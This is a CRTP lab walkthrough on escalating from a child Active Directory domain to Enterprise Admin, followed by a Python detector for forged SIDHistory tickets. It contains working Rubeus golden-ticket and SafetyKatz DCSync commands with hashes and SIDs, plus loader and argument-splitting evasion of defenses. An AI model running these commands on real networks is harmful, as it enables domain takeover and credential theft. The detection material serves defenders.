CRTP Lab 19
Task
Using DA access to dollarcorp.moneycorp.local, escalate privileges to Enterprise Admin, or to DA in the parent domain moneycorp.local, using dollarcorp's krbtgt hash.
Since we already have the krbtgt AES key from dcorp-dc, we can forge an inter-realm TGT (a golden ticket for dollarcorp with the parent domain's Enterprise Admins SID, RID 519, placed in SIDHistory via /sids) and inject it into the current session with /ptt:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args golden /user:Administrator /id:500 /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /netbios:dcorp /ptt
We can now access mcorp-dc (the parent domain's DC) and confirm the context with winrs:
winrs -r:mcorp-dc.moneycorp.local cmd
C:\Users\Administrator.dcorp>set username
set username
USERNAME=Administrator
C:\Users\Administrator.dcorp>set computername
set computername
COMPUTERNAME=MCORP-DC
C:\Users\Administrator.dcorp>
To dump the NTLM hash of the parent domain's krbtgt account (mcorp\krbtgt) via DCSync:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local" "exit"
Or run the same DCSync with the "lsadump::dcsync" string supplied through the ArgSplit-generated %Pwn% variable instead of the literal string:
# ArgSplit for "lsadump::dcsync"
C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "%Pwn% /user:mcorp\krbtgt /domain:moneycorp.local" "exit"
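From the defender's side, the step that makes this escalation work is the /sids value: the child-domain ticket carries the forest root's Enterprise Admins SID in SIDHistory, so mcorp-dc treats a dollarcorp account as an Enterprise Admin without any real group membership. The script below is an added example (not part of the lab notes or of Rubeus/SafetyKatz) showing one way to detect that: compare the group SIDs observed in a logon session with the memberships the directory actually records, and flag cross-domain privileged SIDs that the directory does not back. The event records and the membership snapshot are constructed for the example; the record shape loosely follows Windows Security event 4627 (Group Membership Information), but the field names are simplified assumptions rather than the exact Windows schema.

```python
"""Detect forest-root privileged SIDs in a logon session that the directory does
not explain (SIDHistory / inter-realm golden ticket abuse).

Constructed example data only; field names are assumptions, not the exact
Windows event schema.
"""
from dataclasses import dataclass

# Domain SIDs as used in the lab: child (dollarcorp) and forest root (moneycorp).
DCORP_SID = "S-1-5-21-719815819-3726368948-3917688648"
MCORP_SID = "S-1-5-21-335606122-960912869-3279953914"

# Well-known RIDs of groups that exist only in the forest root domain and grant
# forest-wide control. A child-domain account holding one of these through a
# SID it was never actually granted is the signal we are looking for.
FOREST_ROOT_PRIVILEGED_RIDS = {518: "Schema Admins", 519: "Enterprise Admins"}


@dataclass
class LogonEvent:
    """Simplified stand-in for a 4627-style record (assumed field names)."""
    target_user: str        # account name, e.g. "Administrator"
    target_domain_sid: str  # SID of the domain the account belongs to
    user_rid: int           # RID of the account (500 = built-in Administrator)
    workstation: str        # host where the logon session was created
    group_sids: list        # effective group SIDs in the new logon session


def domain_of(sid: str) -> str:
    """Return the domain portion of an account or group SID."""
    return sid.rsplit("-", 1)[0]


def rid_of(sid: str) -> int:
    """Return the trailing RID of an account or group SID."""
    return int(sid.rsplit("-", 1)[1])


def find_foreign_privilege(event: LogonEvent, directory_membership: dict) -> list:
    """Return (group_name, group_sid) pairs for session group SIDs that
    (a) come from a domain other than the account's own,
    (b) map to a privileged forest-root RID, and
    (c) are not backed by real membership in the directory snapshot.
    Condition (c) is what separates a genuine child-domain Enterprise Admin
    from a forged ticket that merely claims the SID."""
    account_sid = f"{event.target_domain_sid}-{event.user_rid}"
    real_groups = directory_membership.get(account_sid, set())
    findings = []
    for gsid in event.group_sids:
        if domain_of(gsid) == event.target_domain_sid:
            continue  # same-domain group: ordinary membership, not cross-domain SIDHistory
        name = FOREST_ROOT_PRIVILEGED_RIDS.get(rid_of(gsid))
        if name is None or gsid in real_groups:
            continue  # not a privileged root group, or the directory confirms it
        findings.append((name, gsid))
    return findings


def scan(events: list, directory_membership: dict) -> list:
    """Run the check over a batch of events and return one alert dict per hit."""
    alerts = []
    for ev in events:
        for name, gsid in find_foreign_privilege(ev, directory_membership):
            alerts.append({
                "user": ev.target_user,
                "account_domain": domain_of(f"{ev.target_domain_sid}-{ev.user_rid}"),
                "host": ev.workstation,
                "claimed_group": name,
                "claimed_sid": gsid,
            })
    return alerts


# Constructed directory snapshot: account SID -> set of group SIDs it really holds.
# 'svc_forestadmin' is a genuine child-domain Enterprise Admin; dcorp's
# Administrator (RID 500) holds only child-domain groups.
DIRECTORY = {
    f"{DCORP_SID}-500": {f"{DCORP_SID}-512"},
    f"{DCORP_SID}-1105": {f"{DCORP_SID}-513", f"{MCORP_SID}-519"},
}

# Constructed events: the forged-ticket logon from the lab, a legitimate EA logon,
# and a plain domain-admin logon inside the child domain.
EVENTS = [
    LogonEvent("Administrator", DCORP_SID, 500, "MCORP-DC",
               [f"{DCORP_SID}-512", f"{DCORP_SID}-513", f"{MCORP_SID}-519"]),
    LogonEvent("svc_forestadmin", DCORP_SID, 1105, "MCORP-DC",
               [f"{DCORP_SID}-513", f"{MCORP_SID}-519"]),
    LogonEvent("Administrator", DCORP_SID, 500, "DCORP-DC",
               [f"{DCORP_SID}-512", f"{DCORP_SID}-513"]),
]

if __name__ == "__main__":
    for alert in scan(EVENTS, DIRECTORY):
        print(alert)
```

The membership snapshot would in practice be pulled from the forest root (for example, the members of Enterprise Admins via LDAP) on a schedule, and the events from the root DCs' Security logs; the comparison itself is the same. Legitimate child-domain accounts that really are Enterprise Admins are excluded by the directory lookup, so the alert fires only when the session claims a privilege the directory never granted, which is exactly what an inter-realm golden ticket with /sids produces.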